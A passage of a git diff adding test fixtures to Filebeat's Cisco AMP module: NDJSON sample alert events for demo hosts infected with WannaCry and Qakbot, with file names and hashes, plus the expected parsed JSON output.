Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json new file mode 100644 index 00000000000..546e93300ef --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json @@ -0,0 +1,2575 @@ +[ + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 96000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 0, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 862000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1522, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 659000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5147, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 